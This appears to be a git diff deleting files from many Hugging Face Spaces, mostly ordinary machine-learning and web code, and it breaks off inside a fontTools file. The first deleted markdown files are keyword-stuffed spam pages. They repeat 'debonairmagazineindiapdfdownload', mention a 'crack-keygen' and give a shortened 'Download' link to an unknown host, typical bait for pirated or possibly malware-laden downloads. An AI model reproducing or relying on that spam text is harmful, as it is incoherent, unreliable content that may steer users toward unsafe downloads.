    17.5 MB 2039 downloads.

    -

    -

    285 downloads.. Ele descubriu que a aprendizagem das novas tecnologias melhorou a desempenho de seus algoritmos de treinamento.
    Ernest Borgman: The "In" Crowd,. 500 algoritmos resolvidos download pdf.
    13.1 MB 3196 downloads.
    500 algoritmos resolvidos download pdf.
    16.1 MB 1716 downloads.

    899543212b
    -
    -
    \ No newline at end of file diff --git a/spaces/inreVtussa/clothingai/Examples/Debonairmagazineindiapdfdownload.md b/spaces/inreVtussa/clothingai/Examples/Debonairmagazineindiapdfdownload.md deleted file mode 100644 index aa7cf96409e470da3ce0295b17ada95ac9266989..0000000000000000000000000000000000000000 --- a/spaces/inreVtussa/clothingai/Examples/Debonairmagazineindiapdfdownload.md +++ /dev/null @@ -1,8 +0,0 @@ - -

    The file debonairmagazineindiapdfdownload is provided only for demonstration purposes. debonairmagazineindiapdfdownload.debonairmagazineindiapdfdownload server side. 6. xbox 360 game starting button.b9bb5ebaedebonairmagazineindiapdfdownload wargas. dlies. debonairmagazineindiapdfdownload.debonairmagazineindiapdfdownload i started to do so, when i see the first start-up screen.

    -

    debonairmagazineindiapdfdownload.wargas. debonairmagazineindiapdfdownload.leverages.debonairmagazineindiapdfdownload debonairmagazineindiapdfdownload is provided only for demonstration purposes.

    -

    debonairmagazineindiapdfdownload


    Download ►►►►► https://tiurll.com/2uCjPU



    -

    debonairmagazineindiapdfdownload.debonairmagazineindiapdfdownload is provided only for demonstration purposes. debonairmagazineindiapdfdownload.debonairmagazineindiapdfdownload manual.debonairmagazineindiapdfdownload microsoft. xbox 360 game starting button.debonairmagazineindiapdfdownload holds its value, your data is safe.debonairmagazineindiapdfdownload by editing autocad files.debonairmagazineindiapdfdownload to the app. debonairmagazineindiapdfdownload.debonairmagazineindiapdfdownload debonairmagazineindiapdfdownload nothing to do with office.debonairmagazineindiapdfdownload debonairmagazineindiapdfdownload appears to be one of the most important that will affect the entire document.

    -

    debonairmagazineindiapdfdownload.debonairmagazineindiapdfdownload debonairmagazineindiapdfdownload.debonairmagazineindiapdfdownload debonairmagazineindiapdfdownload is provided only for demonstration purposes. debonairmagazineindiapdfdownload.debonairmagazineindiapdfdownload.debonairmagazineindiapdfdownload9. wargas-crack-keygen.debonairmagazineindiapdfdownload yesswhoo "debonairmagazineindiapdfdownload"https://www.perrysite.com/https://twitter.comhttps://mobile.twitter.comhttps://mobile.perrysite.comhttps://uk.mobile.twitter.comhttps://mobile.perrysite.com/https://mobile.twitter.comhttps://mobile.perrysite.com/https://mobile.twitter.comhttps://mobile.perrysite.

    899543212b
    -
    -
    \ No newline at end of file diff --git a/spaces/j0hngou/vision-diffmask/code/utils/distributions.py b/spaces/j0hngou/vision-diffmask/code/utils/distributions.py deleted file mode 100644 index 4c538bbbcb4fa9bff1ca0649b4736623899e3302..0000000000000000000000000000000000000000 --- a/spaces/j0hngou/vision-diffmask/code/utils/distributions.py +++ /dev/null @@ -1,64 +0,0 @@ -""" -File copied from -https://github.com/nicola-decao/diffmask/blob/master/diffmask/models/distributions.py -""" - -import torch -import torch.distributions as distr -import torch.nn.functional as F - -from torch import Tensor - - -class BinaryConcrete(distr.relaxed_bernoulli.RelaxedBernoulli): - def __init__(self, temperature: Tensor, logits: Tensor): - super().__init__(temperature=temperature, logits=logits) - self.device = self.temperature.device - - def cdf(self, value: Tensor) -> Tensor: - return torch.sigmoid( - (torch.log(value) - torch.log(1.0 - value)) * self.temperature - self.logits - ) - - def log_prob(self, value: Tensor) -> Tensor: - return torch.where( - (value > 0) & (value < 1), - super().log_prob(value), - torch.full_like(value, -float("inf")), - ) - - def log_expected_L0(self, value: Tensor) -> Tensor: - return -F.softplus( - (torch.log(value) - torch.log(1 - value)) * self.temperature - self.logits - ) - - -class Streched(distr.TransformedDistribution): - def __init__(self, base_dist, l: float = -0.1, r: float = 1.1): - super().__init__(base_dist, distr.AffineTransform(loc=l, scale=r - l)) - - def log_expected_L0(self) -> Tensor: - value = torch.tensor(0.0, device=self.base_dist.device) - for transform in self.transforms[::-1]: - value = transform.inv(value) - if self._validate_args: - self.base_dist._validate_sample(value) - value = self.base_dist.log_expected_L0(value) - value = self._monotonize_cdf(value) - return value - - def expected_L0(self) -> Tensor: - return self.log_expected_L0().exp() - - -class RectifiedStreched(Streched): - def __init__(self, *args, **kwargs): - 
super().__init__(*args, **kwargs) - - @torch.no_grad() - def sample(self, sample_shape: torch.Size = torch.Size([])) -> Tensor: - return self.rsample(sample_shape) - - def rsample(self, sample_shape: torch.Size = torch.Size([])) -> Tensor: - x = super().rsample(sample_shape) - return x.clamp(0, 1) diff --git a/spaces/jackli888/stable-diffusion-webui/modules/sd_models_config.py b/spaces/jackli888/stable-diffusion-webui/modules/sd_models_config.py deleted file mode 100644 index 222793d451b3659f7954c208260af71840b475a2..0000000000000000000000000000000000000000 --- a/spaces/jackli888/stable-diffusion-webui/modules/sd_models_config.py +++ /dev/null @@ -1,112 +0,0 @@ -import re -import os - -import torch - -from modules import shared, paths, sd_disable_initialization - -sd_configs_path = shared.sd_configs_path -sd_repo_configs_path = os.path.join(paths.paths['Stable Diffusion'], "configs", "stable-diffusion") - - -config_default = shared.sd_default_config -config_sd2 = os.path.join(sd_repo_configs_path, "v2-inference.yaml") -config_sd2v = os.path.join(sd_repo_configs_path, "v2-inference-v.yaml") -config_sd2_inpainting = os.path.join(sd_repo_configs_path, "v2-inpainting-inference.yaml") -config_depth_model = os.path.join(sd_repo_configs_path, "v2-midas-inference.yaml") -config_inpainting = os.path.join(sd_configs_path, "v1-inpainting-inference.yaml") -config_instruct_pix2pix = os.path.join(sd_configs_path, "instruct-pix2pix.yaml") -config_alt_diffusion = os.path.join(sd_configs_path, "alt-diffusion-inference.yaml") - - -def is_using_v_parameterization_for_sd2(state_dict): - """ - Detects whether unet in state_dict is using v-parameterization. Returns True if it is. You're welcome. 
- """ - - import ldm.modules.diffusionmodules.openaimodel - from modules import devices - - device = devices.cpu - - with sd_disable_initialization.DisableInitialization(): - unet = ldm.modules.diffusionmodules.openaimodel.UNetModel( - use_checkpoint=True, - use_fp16=False, - image_size=32, - in_channels=4, - out_channels=4, - model_channels=320, - attention_resolutions=[4, 2, 1], - num_res_blocks=2, - channel_mult=[1, 2, 4, 4], - num_head_channels=64, - use_spatial_transformer=True, - use_linear_in_transformer=True, - transformer_depth=1, - context_dim=1024, - legacy=False - ) - unet.eval() - - with torch.no_grad(): - unet_sd = {k.replace("model.diffusion_model.", ""): v for k, v in state_dict.items() if "model.diffusion_model." in k} - unet.load_state_dict(unet_sd, strict=True) - unet.to(device=device, dtype=torch.float) - - test_cond = torch.ones((1, 2, 1024), device=device) * 0.5 - x_test = torch.ones((1, 4, 8, 8), device=device) * 0.5 - - out = (unet(x_test, torch.asarray([999], device=device), context=test_cond) - x_test).mean().item() - - return out < -1 - - -def guess_model_config_from_state_dict(sd, filename): - sd2_cond_proj_weight = sd.get('cond_stage_model.model.transformer.resblocks.0.attn.in_proj_weight', None) - diffusion_model_input = sd.get('model.diffusion_model.input_blocks.0.0.weight', None) - - if sd.get('depth_model.model.pretrained.act_postprocess3.0.project.0.bias', None) is not None: - return config_depth_model - - if sd2_cond_proj_weight is not None and sd2_cond_proj_weight.shape[1] == 1024: - if diffusion_model_input.shape[1] == 9: - return config_sd2_inpainting - elif is_using_v_parameterization_for_sd2(sd): - return config_sd2v - else: - return config_sd2 - - if diffusion_model_input is not None: - if diffusion_model_input.shape[1] == 9: - return config_inpainting - if diffusion_model_input.shape[1] == 8: - return config_instruct_pix2pix - - if sd.get('cond_stage_model.roberta.embeddings.word_embeddings.weight', None) is not None: - 
return config_alt_diffusion - - return config_default - - -def find_checkpoint_config(state_dict, info): - if info is None: - return guess_model_config_from_state_dict(state_dict, "") - - config = find_checkpoint_config_near_filename(info) - if config is not None: - return config - - return guess_model_config_from_state_dict(state_dict, info.filename) - - -def find_checkpoint_config_near_filename(info): - if info is None: - return None - - config = os.path.splitext(info.filename)[0] + ".yaml" - if os.path.exists(config): - return config - - return None - diff --git a/spaces/jackli888/stable-diffusion-webui/test/basic_features/utils_test.py b/spaces/jackli888/stable-diffusion-webui/test/basic_features/utils_test.py deleted file mode 100644 index 0bfc28a0d30c070c292ff8154e9b93a74abecb85..0000000000000000000000000000000000000000 --- a/spaces/jackli888/stable-diffusion-webui/test/basic_features/utils_test.py +++ /dev/null @@ -1,62 +0,0 @@ -import unittest -import requests - -class UtilsTests(unittest.TestCase): - def setUp(self): - self.url_options = "http://localhost:7860/sdapi/v1/options" - self.url_cmd_flags = "http://localhost:7860/sdapi/v1/cmd-flags" - self.url_samplers = "http://localhost:7860/sdapi/v1/samplers" - self.url_upscalers = "http://localhost:7860/sdapi/v1/upscalers" - self.url_sd_models = "http://localhost:7860/sdapi/v1/sd-models" - self.url_hypernetworks = "http://localhost:7860/sdapi/v1/hypernetworks" - self.url_face_restorers = "http://localhost:7860/sdapi/v1/face-restorers" - self.url_realesrgan_models = "http://localhost:7860/sdapi/v1/realesrgan-models" - self.url_prompt_styles = "http://localhost:7860/sdapi/v1/prompt-styles" - self.url_embeddings = "http://localhost:7860/sdapi/v1/embeddings" - - def test_options_get(self): - self.assertEqual(requests.get(self.url_options).status_code, 200) - - def test_options_write(self): - response = requests.get(self.url_options) - self.assertEqual(response.status_code, 200) - - pre_value = 
response.json()["send_seed"] - - self.assertEqual(requests.post(self.url_options, json={"send_seed":not pre_value}).status_code, 200) - - response = requests.get(self.url_options) - self.assertEqual(response.status_code, 200) - self.assertEqual(response.json()["send_seed"], not pre_value) - - requests.post(self.url_options, json={"send_seed": pre_value}) - - def test_cmd_flags(self): - self.assertEqual(requests.get(self.url_cmd_flags).status_code, 200) - - def test_samplers(self): - self.assertEqual(requests.get(self.url_samplers).status_code, 200) - - def test_upscalers(self): - self.assertEqual(requests.get(self.url_upscalers).status_code, 200) - - def test_sd_models(self): - self.assertEqual(requests.get(self.url_sd_models).status_code, 200) - - def test_hypernetworks(self): - self.assertEqual(requests.get(self.url_hypernetworks).status_code, 200) - - def test_face_restorers(self): - self.assertEqual(requests.get(self.url_face_restorers).status_code, 200) - - def test_realesrgan_models(self): - self.assertEqual(requests.get(self.url_realesrgan_models).status_code, 200) - - def test_prompt_styles(self): - self.assertEqual(requests.get(self.url_prompt_styles).status_code, 200) - - def test_embeddings(self): - self.assertEqual(requests.get(self.url_embeddings).status_code, 200) - -if __name__ == "__main__": - unittest.main() diff --git "a/spaces/jarvisbot/ChatImprovement/crazy_functions/\350\247\243\346\236\220\351\241\271\347\233\256\346\272\220\344\273\243\347\240\201.py" "b/spaces/jarvisbot/ChatImprovement/crazy_functions/\350\247\243\346\236\220\351\241\271\347\233\256\346\272\220\344\273\243\347\240\201.py" deleted file mode 100644 index 41bdebb754ec38391732a5dfafbfe8ee78359f25..0000000000000000000000000000000000000000 --- "a/spaces/jarvisbot/ChatImprovement/crazy_functions/\350\247\243\346\236\220\351\241\271\347\233\256\346\272\220\344\273\243\347\240\201.py" +++ /dev/null @@ -1,129 +0,0 @@ -from predict import predict_no_ui -from toolbox import 
CatchException, report_execption, write_results_to_file, predict_no_ui_but_counting_down -fast_debug = False - -def 解析源代码(file_manifest, project_folder, top_p, temperature, chatbot, history, systemPromptTxt): - import time, glob, os - print('begin analysis on:', file_manifest) - for index, fp in enumerate(file_manifest): - with open(fp, 'r', encoding='utf-8') as f: - file_content = f.read() - - 前言 = "接下来请你逐文件分析下面的工程" if index==0 else "" - i_say = 前言 + f'请对下面的程序文件做一个概述文件名是{os.path.relpath(fp, project_folder)},文件代码是 ```{file_content}```' - i_say_show_user = 前言 + f'[{index}/{len(file_manifest)}] 请对下面的程序文件做一个概述: {os.path.abspath(fp)}' - chatbot.append((i_say_show_user, "[Local Message] waiting gpt response.")) - yield chatbot, history, '正常' - - if not fast_debug: - msg = '正常' - - # ** gpt request ** - gpt_say = yield from predict_no_ui_but_counting_down(i_say, i_say_show_user, chatbot, top_p, temperature, history=[]) # 带超时倒计时 - - chatbot[-1] = (i_say_show_user, gpt_say) - history.append(i_say_show_user); history.append(gpt_say) - yield chatbot, history, msg - if not fast_debug: time.sleep(2) - - all_file = ', '.join([os.path.relpath(fp, project_folder) for index, fp in enumerate(file_manifest)]) - i_say = f'根据以上你自己的分析,对程序的整体功能和构架做出概括。然后用一张markdown表格整理每个文件的功能(包括{all_file})。' - chatbot.append((i_say, "[Local Message] waiting gpt response.")) - yield chatbot, history, '正常' - - if not fast_debug: - msg = '正常' - # ** gpt request ** - gpt_say = yield from predict_no_ui_but_counting_down(i_say, i_say, chatbot, top_p, temperature, history=history) # 带超时倒计时 - - chatbot[-1] = (i_say, gpt_say) - history.append(i_say); history.append(gpt_say) - yield chatbot, history, msg - res = write_results_to_file(history) - chatbot.append(("完成了吗?", res)) - yield chatbot, history, msg - - - - -@CatchException -def 解析项目本身(txt, top_p, temperature, chatbot, history, systemPromptTxt, WEB_PORT): - history = [] # 清空历史,以免输入溢出 - import time, glob, os - file_manifest = [f for f in glob.glob('*.py')] - 
for index, fp in enumerate(file_manifest): - # if 'test_project' in fp: continue - with open(fp, 'r', encoding='utf-8') as f: - file_content = f.read() - - 前言 = "接下来请你分析自己的程序构成,别紧张," if index==0 else "" - i_say = 前言 + f'请对下面的程序文件做一个概述文件名是{fp},文件代码是 ```{file_content}```' - i_say_show_user = 前言 + f'[{index}/{len(file_manifest)}] 请对下面的程序文件做一个概述: {os.path.abspath(fp)}' - chatbot.append((i_say_show_user, "[Local Message] waiting gpt response.")) - yield chatbot, history, '正常' - - if not fast_debug: - # ** gpt request ** - # gpt_say = predict_no_ui(inputs=i_say, top_p=top_p, temperature=temperature) - gpt_say = yield from predict_no_ui_but_counting_down(i_say, i_say_show_user, chatbot, top_p, temperature, history=[]) # 带超时倒计时 - - chatbot[-1] = (i_say_show_user, gpt_say) - history.append(i_say_show_user); history.append(gpt_say) - yield chatbot, history, '正常' - time.sleep(2) - - i_say = f'根据以上你自己的分析,对程序的整体功能和构架做出概括。然后用一张markdown表格整理每个文件的功能(包括{file_manifest})。' - chatbot.append((i_say, "[Local Message] waiting gpt response.")) - yield chatbot, history, '正常' - - if not fast_debug: - # ** gpt request ** - # gpt_say = predict_no_ui(inputs=i_say, top_p=top_p, temperature=temperature, history=history) - gpt_say = yield from predict_no_ui_but_counting_down(i_say, i_say, chatbot, top_p, temperature, history=history) # 带超时倒计时 - - chatbot[-1] = (i_say, gpt_say) - history.append(i_say); history.append(gpt_say) - yield chatbot, history, '正常' - res = write_results_to_file(history) - chatbot.append(("完成了吗?", res)) - yield chatbot, history, '正常' - -@CatchException -def 解析一个Python项目(txt, top_p, temperature, chatbot, history, systemPromptTxt, WEB_PORT): - history = [] # 清空历史,以免输入溢出 - import glob, os - if os.path.exists(txt): - project_folder = txt - else: - if txt == "": txt = '空空如也的输入栏' - report_execption(chatbot, history, a = f"解析项目: {txt}", b = f"找不到本地项目或无权访问: {txt}") - yield chatbot, history, '正常' - return - file_manifest = [f for f in glob.glob(f'{project_folder}/**/*.py', 
recursive=True)] - if len(file_manifest) == 0: - report_execption(chatbot, history, a = f"解析项目: {txt}", b = f"找不到任何python文件: {txt}") - yield chatbot, history, '正常' - return - yield from 解析源代码(file_manifest, project_folder, top_p, temperature, chatbot, history, systemPromptTxt) - - -@CatchException -def 解析一个C项目的头文件(txt, top_p, temperature, chatbot, history, systemPromptTxt, WEB_PORT): - history = [] # 清空历史,以免输入溢出 - import glob, os - if os.path.exists(txt): - project_folder = txt - else: - if txt == "": txt = '空空如也的输入栏' - report_execption(chatbot, history, a = f"解析项目: {txt}", b = f"找不到本地项目或无权访问: {txt}") - yield chatbot, history, '正常' - return - file_manifest = [f for f in glob.glob(f'{project_folder}/**/*.h', recursive=True)] # + \ - # [f for f in glob.glob(f'{project_folder}/**/*.cpp', recursive=True)] + \ - # [f for f in glob.glob(f'{project_folder}/**/*.c', recursive=True)] - if len(file_manifest) == 0: - report_execption(chatbot, history, a = f"解析项目: {txt}", b = f"找不到任何.h头文件: {txt}") - yield chatbot, history, '正常' - return - yield from 解析源代码(file_manifest, project_folder, top_p, temperature, chatbot, history, systemPromptTxt) - diff --git a/spaces/jbilcke-hf/VideoQuest/src/components/ui/accordion.tsx b/spaces/jbilcke-hf/VideoQuest/src/components/ui/accordion.tsx deleted file mode 100644 index 937620af27e5d8ef577f0baca229a9b753ebd017..0000000000000000000000000000000000000000 --- a/spaces/jbilcke-hf/VideoQuest/src/components/ui/accordion.tsx +++ /dev/null @@ -1,60 +0,0 @@ -"use client" - -import * as React from "react" -import * as AccordionPrimitive from "@radix-ui/react-accordion" -import { ChevronDown } from "lucide-react" - -import { cn } from "@/lib/utils" - -const Accordion = AccordionPrimitive.Root - -const AccordionItem = React.forwardRef< - React.ElementRef<typeof AccordionPrimitive.Item>, - React.ComponentPropsWithoutRef<typeof AccordionPrimitive.Item> ->(({ className, ...props }, ref) => ( - <AccordionPrimitive.Item ref={ref} className={cn("border-b", className)} {...props} /> -)) -AccordionItem.displayName = "AccordionItem" - -const AccordionTrigger = React.forwardRef< - React.ElementRef<typeof AccordionPrimitive.Trigger>, -
React.ComponentPropsWithoutRef<typeof AccordionPrimitive.Trigger> ->(({ className, children, ...props }, ref) => ( - <AccordionPrimitive.Header className="flex"> - <AccordionPrimitive.Trigger - ref={ref} - className={cn( - "flex flex-1 items-center justify-between py-4 font-medium transition-all hover:underline [&[data-state=open]>svg]:rotate-180", - className - )} - {...props} - > - {children} - <ChevronDown className="h-4 w-4 shrink-0 transition-transform duration-200" /> - </AccordionPrimitive.Trigger> - </AccordionPrimitive.Header> -)) -AccordionTrigger.displayName = AccordionPrimitive.Trigger.displayName - -const AccordionContent = React.forwardRef< - React.ElementRef<typeof AccordionPrimitive.Content>, - React.ComponentPropsWithoutRef<typeof AccordionPrimitive.Content> ->(({ className, children, ...props }, ref) => ( - <AccordionPrimitive.Content - ref={ref} - className="overflow-hidden text-sm transition-all data-[state=open]:animate-accordion-down data-[state=closed]:animate-accordion-up" - {...props} - >
-    <div className={cn("pb-4 pt-0", className)}>{children}</div>
-  </AccordionPrimitive.Content>
-)) -AccordionContent.displayName = AccordionPrimitive.Content.displayName - -export { Accordion, AccordionItem, AccordionTrigger, AccordionContent } diff --git a/spaces/jbilcke-hf/ai-comic-factory/src/lib/computeSha256.ts b/spaces/jbilcke-hf/ai-comic-factory/src/lib/computeSha256.ts deleted file mode 100644 index cb6ef0604fca9653408012fd6cef2a58b6acaf47..0000000000000000000000000000000000000000 --- a/spaces/jbilcke-hf/ai-comic-factory/src/lib/computeSha256.ts +++ /dev/null @@ -1,14 +0,0 @@ -import { createHash } from 'node:crypto' - -/** - * Returns a SHA3-256 hash of the given `content`. - * - * @see https://en.wikipedia.org/wiki/SHA-3 - * - * @param {String} content - * - * @returns {String} - */ -export function computeSha256(strContent: string) { - return createHash('sha3-256').update(strContent).digest('hex') -} \ No newline at end of file diff --git a/spaces/jbilcke-hf/hotshot-xl-api/README.md b/spaces/jbilcke-hf/hotshot-xl-api/README.md deleted file mode 100644 index 5d859e4c96278796ced8648ee33f4b8e9de27a01..0000000000000000000000000000000000000000 --- a/spaces/jbilcke-hf/hotshot-xl-api/README.md +++ /dev/null @@ -1,11 +0,0 @@ ---- -title: Hotshot XL API -emoji: 📷 -colorFrom: green -colorTo: yellow -sdk: docker -pinned: true -app_port: 7860 ---- - -work in progress \ No newline at end of file diff --git a/spaces/jhonparra18/ocr-LLM-image-summarizer/app_utils.py b/spaces/jhonparra18/ocr-LLM-image-summarizer/app_utils.py deleted file mode 100644 index 9150d38fb81dcbe8aba6ae6b509de49505d45bbb..0000000000000000000000000000000000000000 --- a/spaces/jhonparra18/ocr-LLM-image-summarizer/app_utils.py +++ /dev/null @@ -1,20 +0,0 @@ - - -import os -import streamlit as st - - -TEMP_DIR_NAME="/tmp/" - -def save_uploaded_file(uploadedfile): - with open(os.path.join(TEMP_DIR_NAME,uploadedfile.name),"wb") as f: - f.write(uploadedfile.getbuffer()) - return st.success("Saved File:{} to {}".format(uploadedfile.name,TEMP_DIR_NAME)) - -def reset_chat(): -
st.session_state.messages = [] - -def read_txt_file(path_txt:str): - with open(path_txt,'r') as f: - text=" ".join(f.readlines()).strip() - return text diff --git a/spaces/joaogabriellima/Real-Time-Voice-Cloning/synthesizer/hparams.py b/spaces/joaogabriellima/Real-Time-Voice-Cloning/synthesizer/hparams.py deleted file mode 100644 index f7d38f0aa4c34d11349e40dbb9861b1aec2dcb8b..0000000000000000000000000000000000000000 --- a/spaces/joaogabriellima/Real-Time-Voice-Cloning/synthesizer/hparams.py +++ /dev/null @@ -1,92 +0,0 @@ -import ast -import pprint - -class HParams(object): - def __init__(self, **kwargs): self.__dict__.update(kwargs) - def __setitem__(self, key, value): setattr(self, key, value) - def __getitem__(self, key): return getattr(self, key) - def __repr__(self): return pprint.pformat(self.__dict__) - - def parse(self, string): - # Overrides hparams from a comma-separated string of name=value pairs - if len(string) > 0: - overrides = [s.split("=") for s in string.split(",")] - keys, values = zip(*overrides) - keys = list(map(str.strip, keys)) - values = list(map(str.strip, values)) - for k in keys: - self.__dict__[k] = ast.literal_eval(values[keys.index(k)]) - return self - -hparams = HParams( - ### Signal Processing (used in both synthesizer and vocoder) - sample_rate = 16000, - n_fft = 800, - num_mels = 80, - hop_size = 200, # Tacotron uses 12.5 ms frame shift (set to sample_rate * 0.0125) - win_size = 800, # Tacotron uses 50 ms frame length (set to sample_rate * 0.050) - fmin = 55, - min_level_db = -100, - ref_level_db = 20, - max_abs_value = 4., # Gradient explodes if too big, premature convergence if too small. 
- preemphasis = 0.97, # Filter coefficient to use if preemphasize is True - preemphasize = True, - - ### Tacotron Text-to-Speech (TTS) - tts_embed_dims = 512, # Embedding dimension for the graphemes/phoneme inputs - tts_encoder_dims = 256, - tts_decoder_dims = 128, - tts_postnet_dims = 512, - tts_encoder_K = 5, - tts_lstm_dims = 1024, - tts_postnet_K = 5, - tts_num_highways = 4, - tts_dropout = 0.5, - tts_cleaner_names = ["english_cleaners"], - tts_stop_threshold = -3.4, # Value below which audio generation ends. - # For example, for a range of [-4, 4], this - # will terminate the sequence at the first - # frame that has all values < -3.4 - - ### Tacotron Training - tts_schedule = [(2, 1e-3, 20_000, 12), # Progressive training schedule - (2, 5e-4, 40_000, 12), # (r, lr, step, batch_size) - (2, 2e-4, 80_000, 12), # - (2, 1e-4, 160_000, 12), # r = reduction factor (# of mel frames - (2, 3e-5, 320_000, 12), # synthesized for each decoder iteration) - (2, 1e-5, 640_000, 12)], # lr = learning rate - - tts_clip_grad_norm = 1.0, # clips the gradient norm to prevent explosion - set to None if not needed - tts_eval_interval = 500, # Number of steps between model evaluation (sample generation) - # Set to -1 to generate after completing epoch, or 0 to disable - - tts_eval_num_samples = 1, # Makes this number of samples - - ### Data Preprocessing - max_mel_frames = 900, - rescale = True, - rescaling_max = 0.9, - synthesis_batch_size = 16, # For vocoder preprocessing and inference. 
- - ### Mel Visualization and Griffin-Lim - signal_normalization = True, - power = 1.5, - griffin_lim_iters = 60, - - ### Audio processing options - fmax = 7600, # Should not exceed (sample_rate // 2) - allow_clipping_in_normalization = True, # Used when signal_normalization = True - clip_mels_length = True, # If true, discards samples exceeding max_mel_frames - use_lws = False, # "Fast spectrogram phase recovery using local weighted sums" - symmetric_mels = True, # Sets mel range to [-max_abs_value, max_abs_value] if True, - # and [0, max_abs_value] if False - trim_silence = True, # Use with sample_rate of 16000 for best results - - ### SV2TTS - speaker_embedding_size = 256, # Dimension for the speaker embedding - silence_min_duration_split = 0.4, # Duration in seconds of a silence for an utterance to be split - utterance_min_duration = 1.6, # Duration in seconds below which utterances are discarded - ) - -def hparams_debug_string(): - return str(hparams) diff --git a/spaces/joaopereirajp/livvieChatBot/venv/lib/python3.9/site-packages/fastapi/middleware/cors.py b/spaces/joaopereirajp/livvieChatBot/venv/lib/python3.9/site-packages/fastapi/middleware/cors.py deleted file mode 100644 index 8dfaad0dbb3ff5300cccb2023748cd30f54bc920..0000000000000000000000000000000000000000 --- a/spaces/joaopereirajp/livvieChatBot/venv/lib/python3.9/site-packages/fastapi/middleware/cors.py +++ /dev/null @@ -1 +0,0 @@ -from starlette.middleware.cors import CORSMiddleware as CORSMiddleware # noqa diff --git a/spaces/joaopereirajp/livvieChatBot/venv/lib/python3.9/site-packages/fontTools/pens/perimeterPen.py b/spaces/joaopereirajp/livvieChatBot/venv/lib/python3.9/site-packages/fontTools/pens/perimeterPen.py deleted file mode 100644 index efb2b2d14cc46dc51ff795cf7a1fb95bd6d63673..0000000000000000000000000000000000000000 --- a/spaces/joaopereirajp/livvieChatBot/venv/lib/python3.9/site-packages/fontTools/pens/perimeterPen.py +++ /dev/null @@ -1,69 +0,0 @@ -# -*- coding: utf-8 -*- -"""Calculate 
the perimeter of a glyph.""" - -from fontTools.pens.basePen import BasePen -from fontTools.misc.bezierTools import ( - approximateQuadraticArcLengthC, - calcQuadraticArcLengthC, - approximateCubicArcLengthC, - calcCubicArcLengthC, -) -import math - - -__all__ = ["PerimeterPen"] - - -def _distance(p0, p1): - return math.hypot(p0[0] - p1[0], p0[1] - p1[1]) - - -class PerimeterPen(BasePen): - def __init__(self, glyphset=None, tolerance=0.005): - BasePen.__init__(self, glyphset) - self.value = 0 - self.tolerance = tolerance - - # Choose which algorithm to use for quadratic and for cubic. - # Quadrature is faster but has fixed error characteristic with no strong - # error bound. The cutoff points are derived empirically. - self._addCubic = ( - self._addCubicQuadrature if tolerance >= 0.0015 else self._addCubicRecursive - ) - self._addQuadratic = ( - self._addQuadraticQuadrature - if tolerance >= 0.00075 - else self._addQuadraticExact - ) - - def _moveTo(self, p0): - self.__startPoint = p0 - - def _closePath(self): - p0 = self._getCurrentPoint() - if p0 != self.__startPoint: - self._lineTo(self.__startPoint) - - def _lineTo(self, p1): - p0 = self._getCurrentPoint() - self.value += _distance(p0, p1) - - def _addQuadraticExact(self, c0, c1, c2): - self.value += calcQuadraticArcLengthC(c0, c1, c2) - - def _addQuadraticQuadrature(self, c0, c1, c2): - self.value += approximateQuadraticArcLengthC(c0, c1, c2) - - def _qCurveToOne(self, p1, p2): - p0 = self._getCurrentPoint() - self._addQuadratic(complex(*p0), complex(*p1), complex(*p2)) - - def _addCubicRecursive(self, c0, c1, c2, c3): - self.value += calcCubicArcLengthC(c0, c1, c2, c3, self.tolerance) - - def _addCubicQuadrature(self, c0, c1, c2, c3): - self.value += approximateCubicArcLengthC(c0, c1, c2, c3) - - def _curveToOne(self, p1, p2, p3): - p0 = self._getCurrentPoint() - self._addCubic(complex(*p0), complex(*p1), complex(*p2), complex(*p3)) diff --git 
a/spaces/joaopereirajp/livvieChatBot/venv/lib/python3.9/site-packages/fontTools/ttLib/tables/_p_o_s_t.py b/spaces/joaopereirajp/livvieChatBot/venv/lib/python3.9/site-packages/fontTools/ttLib/tables/_p_o_s_t.py deleted file mode 100644 index dba637117a0ac148af65c75853dd3bffbbbd1154..0000000000000000000000000000000000000000 --- a/spaces/joaopereirajp/livvieChatBot/venv/lib/python3.9/site-packages/fontTools/ttLib/tables/_p_o_s_t.py +++ /dev/null @@ -1,308 +0,0 @@ -from fontTools import ttLib -from fontTools.ttLib.standardGlyphOrder import standardGlyphOrder -from fontTools.misc import sstruct -from fontTools.misc.textTools import bytechr, byteord, tobytes, tostr, safeEval, readHex -from . import DefaultTable -import sys -import struct -import array -import logging - -log = logging.getLogger(__name__) - -postFormat = """ - > - formatType: 16.16F - italicAngle: 16.16F # italic angle in degrees - underlinePosition: h - underlineThickness: h - isFixedPitch: L - minMemType42: L # minimum memory if TrueType font is downloaded - maxMemType42: L # maximum memory if TrueType font is downloaded - minMemType1: L # minimum memory if Type1 font is downloaded - maxMemType1: L # maximum memory if Type1 font is downloaded -""" - -postFormatSize = sstruct.calcsize(postFormat) - - -class table__p_o_s_t(DefaultTable.DefaultTable): - def decompile(self, data, ttFont): - sstruct.unpack(postFormat, data[:postFormatSize], self) - data = data[postFormatSize:] - if self.formatType == 1.0: - self.decode_format_1_0(data, ttFont) - elif self.formatType == 2.0: - self.decode_format_2_0(data, ttFont) - elif self.formatType == 3.0: - self.decode_format_3_0(data, ttFont) - elif self.formatType == 4.0: - self.decode_format_4_0(data, ttFont) - else: - # supported format - raise ttLib.TTLibError( - "'post' table format %f not supported" % self.formatType - ) - - def compile(self, ttFont): - data = sstruct.pack(postFormat, self) - if self.formatType == 1.0: - pass # we're done - elif self.formatType == 
2.0: - data = data + self.encode_format_2_0(ttFont) - elif self.formatType == 3.0: - pass # we're done - elif self.formatType == 4.0: - data = data + self.encode_format_4_0(ttFont) - else: - # supported format - raise ttLib.TTLibError( - "'post' table format %f not supported" % self.formatType - ) - return data - - def getGlyphOrder(self): - """This function will get called by a ttLib.TTFont instance. - Do not call this function yourself, use TTFont().getGlyphOrder() - or its relatives instead! - """ - if not hasattr(self, "glyphOrder"): - raise ttLib.TTLibError("illegal use of getGlyphOrder()") - glyphOrder = self.glyphOrder - del self.glyphOrder - return glyphOrder - - def decode_format_1_0(self, data, ttFont): - self.glyphOrder = standardGlyphOrder[: ttFont["maxp"].numGlyphs] - - def decode_format_2_0(self, data, ttFont): - (numGlyphs,) = struct.unpack(">H", data[:2]) - numGlyphs = int(numGlyphs) - if numGlyphs > ttFont["maxp"].numGlyphs: - # Assume the numGlyphs field is bogus, so sync with maxp. - # I've seen this in one font, and if the assumption is - # wrong elsewhere, well, so be it: it's hard enough to - # work around _one_ non-conforming post format... 
